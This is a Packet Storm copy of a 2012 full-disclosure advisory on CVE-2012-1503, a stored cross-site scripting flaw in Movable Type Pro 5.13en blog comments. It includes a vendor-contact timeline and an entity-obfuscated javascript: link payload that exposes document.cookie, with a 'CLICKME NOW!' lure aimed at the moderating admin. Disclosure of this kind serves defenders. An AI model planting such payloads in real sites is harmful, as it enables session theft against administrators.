exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Movable Type Pro 5.13en Cross Site Scripting

Movable Type Pro 5.13en Cross Site Scripting
Posted Oct 20, 2012
Authored by sqlhacker

Movable Type Pro version 5.13en suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2012-1503
SHA-256 | bf82bb648dc9f22cb36a1677d8d850cec96c1e5d3c90e9d4374694ff15a16e67

Movable Type Pro 5.13en Cross Site Scripting

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Source URL: http://www.cloudscan.me/2012/10/cve-2012-1503-movable-type-pro-513en.html

Keywords: CVE-2012-1503, Movable Type Pro 5.13en, Stored XSS,
JavaScript Injection, Vendor Unresponsive, Full Disclosure

Introduction

Movable Type (MT) started as one of the industries first blogging platforms
and has developed into an industry leading publishing platform which has
been used globally for more than 10 years. Movable Type makes it simple to
manage entire websites, start new blogs, and build an engaged community of
readers and customers.

Six Apart KK has assumed responsibility over all intellectual property and
business operations of Movable Type, as well as trademark rights of Six
Apart. The new Six Apart, a Japanese corporation formerly known as Six
Apart KK, currently develops, markets and supports Movable Type for a
global user base, and also operates the company's website
(www.sixapart.com). The application can be downloaded from URL
http://www.movabletype.com/download/.

Exploit

Our researchers discovered a persistent XSS vulnerability, allowing an
attacker to inject arbitrary script code into the comment section of any
existing Mt5.13en installation. The blog comment is being moderated before
published; that means an attacker can target the moderating Admin
(employee) via Javascript Injection.

Exploit Code:

<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>
X X X X X X X X X X X X X X X<br>
X X X X X X X X X X X X X X X<br>
X X X X CLICKME NOW! X X X X<br>
X X X X X X X X X X X X X X X<br>
X X X X X X X X X X X X X X X</a>

Screenshot at URL
http://www.cloudscan.me/2012/10/cve-2012-1503-movable-type-pro-513en.html

Bug Metrics: CVSS 6.5

Timeline

March 2012 - Email PoC to Vendor via mt-security@sixapart.jp
April 2012 - No Response from Vendor
May 2012 - Email PoC to Vendor via mt-security@sixapart.jp
October 2012 - Full Disclosure

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 2599)
Charset: utf-8

wsBVAwUBUIFqUXz+WcLIygj0AQhJ4Af8DaKXqSTGW30YeoLXeq0kUhqXQ0BicpW8
UZGCMMnlgct7DVh36GIxWc/60WXtuA8nuPqSm7eMKbIrMsvQXPhg9o8MB0LErh49
e7DY1rZ5hVpq1jVqEEQIyu2bxqS8epFR9/5CSUukGnTwaf4gTna8ZB5UZoRPhLI9
ih/OKS1L1WZeykUqZB6oSjkc4t3AeS6iYdXZMvkSrwSgnN6iUKBa3lSSzuEzEmfv
Qhuvb0R6YxNMQafHOr4IlNa/A2rgGBlhYB3P5/wXdAmcnjIhPC4qtH6ik52+NiKQ
3m5Jr3V2rXVhJRrRwj0ubC4PtfVjIC1YP/k4zY0gA7DOmHhZKk+7Iw==
=JXEo
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close